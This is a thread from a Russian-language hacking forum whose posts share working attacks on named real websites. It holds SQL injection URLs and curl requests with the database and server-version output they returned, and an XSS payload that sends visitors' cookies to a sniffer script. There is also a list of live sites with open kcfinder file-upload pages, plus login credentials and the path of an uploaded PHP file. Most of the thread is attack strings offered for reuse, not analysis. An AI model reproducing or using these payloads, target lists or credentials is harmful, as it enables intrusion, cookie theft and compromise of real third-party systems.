ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

07.10.2017, 18:57
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
|
|
|

07.10.2017, 19:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
бабадука спроси
PS:Сиски тоже видели все но на ютубе их замазывают
|
|
|
|

08.10.2017, 09:56
|
|
Guest
Сообщений: n/a
Провел на форуме: 2123
Репутация:
1
|
|
Сайт: http://www.vacbanned.com
Уязвимость: SQL Injection
Эксплойт:
Код:
Code:
http://www.vacbanned.com:80/view/detail/id/76561197960265741) AND 3612=3612 AND (8789=8789
MySQL > 5.0.11
available databases [3]:
[*] information_schema
[*] vacbanned_dev
[*] vacbanned_v2
|
|
|
|

01.11.2017, 01:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Засунул в инпутах фейка https://wf-code.ru
[CODE]
Code:
">img = new Image(); img.src = "/snif.php?c="+document.cookie+window.location.href;
|
|
|
|

06.12.2017, 14:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
SSRF Подъехала
Код:
Code:
https://us.hidester.co
.SpoilerTarget" type="button">Spoiler

Кто сможет перейти на другой протокол пишите метод
|
|
|
|

01.02.2018, 23:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Arbitrary file upload 1.php.asd
Код:
Code:
http://ecaterix.md/ecaterix.md/kcfinder/browse.php
http://www.basukiwater.com/assets/js/mylibs/kcfinder/browse.php
http://www.oonohousing.com/member/user/kcfinder/browse.php
http://www.golfoldcourse.com/kcfinder/browse.php
http://www.careersinmorocco.com/www3/assets/js/ckeditor/kcfinder/browse.php
http://dinamikadwiputraperkasajaya.com/admin/assets/kcfinder/browse.php
http://grossiste-tissus.fr/ckeditor/kcfinder/browse.php
http://ex-theatreasia.com/kcfinder/browse.php
http://tohmei-group.sakura.ne.jp/user_data/packages/admin/js/kcfinder/browse.php
http://www.urfaposet.com/panel/kcfinder/browse.php
http://www.raksthai.org/asset/kcfinder/
http://www.godimex.pl/sklep/design/_js_libs/ckeditor/kcfinder/browse.php
http://hadu.org/kcfinder/browse.php
Гуглом можно насобирать сайтов
|
|
|
|

02.02.2018, 00:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 97114
Репутация:
24
|
|
Сообщение от BabaDook
BabaDook said:
↑
Если честно, то к сожалению я ничего не понял, распиши пожалуйста где там уязвимость .
Можем загружать PHP фаилы
L:fm_admin
P:fm_admin
Код:
Code:
http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
|
|
|
|

03.04.2018, 20:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 759330
Репутация:
147
|
|
там оно всё дырявое куда не ткни...
писать бесполезно - пишут, что всё починили и всё работает.
.SpoilerTarget" type="button">Spoiler: Onesecurity - unsecure
Код:
Code:
curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards¶meters%5Btype%5D=z%27 union select 1,@@version--+¶meters%5Bdirection%5D=DESC¶meters%5Bget_active%5D=true"
"Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
|
|
|
|

08.04.2018, 18:52
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
.SpoilerTarget" type="button">Spoiler
http://polisk.kiev.ua/prod_download.php?id=1+and+false+UnIoN SELect 1,2,user(),4&ext=
http://sclass.kiev.ua/im.php?show=groupsrecifications&kod_group=10)+/*!12345UnIoN*/+SeLEcT+user()+--+-&specifications=W126''
http://xenon77.com.ua/production_lis...4,user(),6,7,8
http://www.newchemistry.ru/himbases...,table_name,0x3a,column_name))),@))),3, 4+--+-
|
|
|
|

10.04.2018, 16:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 96779
Репутация:
5
|
|
+ sql inject
Код:
Code:
http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|